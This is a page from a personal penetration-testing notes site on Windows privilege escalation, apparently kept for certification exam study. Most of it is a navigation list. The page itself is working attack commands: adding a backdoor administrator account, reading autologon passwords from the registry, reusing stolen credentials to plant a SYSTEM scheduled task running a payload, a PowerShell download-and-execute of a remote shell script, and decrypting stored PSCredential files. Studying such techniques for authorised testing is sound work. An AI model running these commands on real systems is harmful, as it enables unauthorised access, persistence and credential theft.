💎
kashz-jewels
  • kashz jewels
  • about kashz
  • oscp exam review
  • pnpt exam review
  • certification exam
  • c2 frameworks
  • kashz-kali
  • OS-LINUX
    • basic
    • linux-enumeration
      • enumeration auto
      • enumeration manual
    • linux-privilege-escalation
      • socat shells
      • sudo su styles
      • dirtyc0w
  • OS-WINDOWS
    • basic
    • windows-enumeration
      • enumeration auto
      • enumeration manual
      • enumeration tools
    • windows-privilege-escalation
      • privesc tools
      • steal NTLM creds
      • socat shells
      • beef browser exploitation
    • windows-post-exploitation
      • dump SAM SYSTEM
      • RDP tools
    • windows-bypass-uac
      • fodhelper
    • windows meterpreter
  • SHELLCODES
    • shells
    • windows shells
  • ACTIVE-DIRECTORY
    • active directory 101
    • kerberos 101
    • asrep roasting
    • kerberoasting
    • powerview.ps1
    • ad module
    • bloodhound
    • golden silver passing ticket
    • group policy management
    • dcsync
    • kerberos backdoor
    • mitm6
    • smb relay ntlmrelayx
    • responder
    • zero logon exploit
    • untested tools
  • OSINT
    • osint
  • BUFFER OVERFLOW GUIDE
    • exploit.py
    • fuzzer.py
    • methodology
  • HASH-n-CRACK
    • crackmapexec
    • hash identifier
    • hashcat
    • hydra
    • john the ripper
    • medusa
    • ncrack
    • rsa
  • TRICKS
    • .mdb file
    • 403 forbidden waf bypass
    • archive, unarchive
    • asp.net server
    • awscli
    • bash scripting
    • bypass bash restrictions
    • curl
    • ffuf wfuzz feroxbuster gobuster
    • file modification
    • git commands
    • git repo analysis
    • http request smuggling
    • json web token (jwt)
    • kali exploit compilation
    • kali multi-network adapters
    • local discovery
    • login bypass
    • magic bytes
    • nmap
    • office document analysis and exploitation
    • openvpn
    • pgp gpg cheatsheet
    • php wrappers, LFI
    • port forwarding
    • port knocking
    • post upload file
    • share files
    • ssh tunnel
    • subnet scan
    • ssh
    • wget
    • wifi
    • windows AppLocker bypass
    • wordlists
    • xss steal cookie
  • PROTOCOLS
    • dns :53
    • epmd :4369
    • ftp :21
    • ident :113
    • imap :143 :993
    • ipsec ike-vpn :500/udp
    • irc
    • ldap :389 :636 :3268 :3269
    • rpc
    • smb :135 :139 :445
    • smtp :25
    • subversion svn :3690
    • tftp :69
  • ATTACKS
    • .hta exploit
    • network scripts
    • print nightmare
    • ssrf
    • xml external entity XXE
  • CHEATSHEET
    • docker
    • drupal
    • gitlab rails
    • impacket guide
    • itemir/apache2fa
    • jenkins
    • jinja2 flask template injection
    • mimikatz
    • powershell
    • redis
    • sqli oracle odat
    • sqli basic
    • sqli influxql
    • sqli mongo
    • sqli ms-sql
    • sqli mysql
    • sqli oracle-sql
    • sqli postgres-sql
    • telnet
    • webdav
    • wordpress
  • SERVICES
    • achat
    • adminLTE
    • adminer.php
    • comment system
    • amanda
    • apache
    • apache exploits
    • apphp microblog
    • arj
    • azure cloud
    • b2evolution
    • bigtree cms
    • bludit cms
    • booked scheduler
    • cacti
    • centreon
    • chef knife
    • cloudMe
    • cms made simple
    • cmsmini
    • coldfusion
    • corehttp
    • cs cart
    • cse online bookstore
    • cuppa cms
    • cutenews cms
    • distccd (DistCC Daemon)
    • docker
    • dolphin2 cms
    • dosbox
    • drupal
    • elastic freepbx
    • elasticsearch kibana
    • epmd
    • exim
    • fail2ban
    • ftp exploits
    • fudforum
    • gitlab community edition
    • gunicorn
    • gym management system
    • h2 database
    • hp power manager
    • iis
    • james remote admin tool
    • jenkins exploits
    • katris
    • koken cms
    • ladon framework
    • laravel
    • lxd
    • magento
    • manage engine applications manager
    • manage engine service desk plus
    • mantis bugtracker
    • monstra cms
    • msfvenom apk
    • mysql exploit
    • nagios xi
    • network video monitoring system
    • nextcloud
    • nginx
    • nodebb
    • nostromo
    • nsclient
    • nsupdate
    • openNetAdmin ona
    • opendocman
    • openemr
    • opensmtpd
    • osclass
    • orient-db-server
    • otrs open ticket request system
    • ovidentia
    • pfsense
    • php file vault
    • php powerbrowse
    • php
    • phpliteadmin
    • phpmyadmin
    • phreebooks bizuno
    • plantronics hub
    • postfix smtp
    • postgres
    • python2 python3
    • quick cms
    • rabbitmq
    • raspAP
    • rconfig management
    • redis exploits
    • rejetto httpfileserver
    • remote-mouse
    • responsive filemanager
    • saltstack
    • sendmail
    • simple php photo gallery
    • small crm
    • smartermail
    • smartstore.net
    • smb exploits
    • sonatype nexus
    • splunk universal forwarder
    • ssh exploits
    • strapi cms
    • subrion cms
    • sudo
    • teamviewer
    • tmux
    • tomcat
    • umbraco
    • unifi video
    • unreal irc
    • usbcreator
    • vtiger crm
    • webcalendar
    • webmin :10000
    • werkzeug httpd
    • windows UsoSvc service
    • windows exploits
    • windows iot core
    • windows token exploits
    • wise care 365, wisebootassistant
    • wordpress plugin exploits
    • xampp
    • yaml
    • yum
    • zabbix
    • zenphoto cms
    • zookeeper exhibitor
Powered by GitBook
On this page
  • background shell
  • Create User
  • DLL hijacking
  • RunAs | Creds reuse using PS
  • Decrypt PSCredential
  • Reference

Was this helpful?

  1. OS-WINDOWS

windows-privilege-escalation

background shell

START /B FILE
Start-Process -NoNewWindow -FilePath FILE -ArgumentList "ARGS" [-Credential $creds]

Create User

# add new user
net user kashz iamR00t123! /add
net localgroup administrators kashz /add
net localgroup "Remote Management Users" kashz /add

DLL hijacking

NOTE: needs RDP-access

# required library files which could be missing; specified with relative paths; absolute paths which could be writable.
> Run Procmon64.exe; filter to service in question; deselect registry activity and network activity
> net start <service>
# see which DLL files are missing and exploit

RunAs | Creds reuse using PS

# runAs
> C:\Windows\System32\runas.exe /savecred /user:DOMAIN\USER "COMMAND"
> C:\Windows\System32\runas.exe /env /noprofile /user:USER PASSWORD "COMMAND"

# using PS
PS> (Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName
PS> (Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword

# once we have the autologon pass
# run shell using saved cred
PS> $username = "kashz"
PS> $password = ConvertTo-SecureString 'PASSWORD' -AsPlainText -Force
PS> $creds = New-Object System.Management.Automation.PSCredential($username, $password)

# run shell as scheduled task
PS> Invoke-Command -Computer HOSTNAME -ScriptBlock { schtasks /create /sc onstart /tn kshell /tr "C:\Users\Public\kashz.exe" /ru SYSTEM } -Credential $creds
PS> Invoke-Command -Computer HOSTNAME -ScriptBlock { schtasks /run /tn kshell } -Credential $creds

# run shell
PS> Start-Process "C:\Users\Public\kashz.exe" -Credential $creds
PS> Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('/shell.ps1')" -Credential $creds

Decrypt PSCredential

# need to be the user who encrypted the data
PS> $UserCred = Import-Clixml -Path <ENCRYPTED-DATA.txt>
| ERROR: Error occurred during a cryptographic operation. => not the right user.
PS>  $UserCred.GetNetworkCredential().password

PS> $user = "USER"
PS> $pass = "ENCRYPTED-DATA" | convertto-securestring
PS> $cred = New-Object System.Management.Automation.PSCredential($user, $pass)
PS> $cred.GetNetworkCredential() | fl

Reference

Previousenumeration toolsNextprivesc tools

Last updated 3 years ago

Was this helpful?

travisgan.com/powershell-password-encryption.html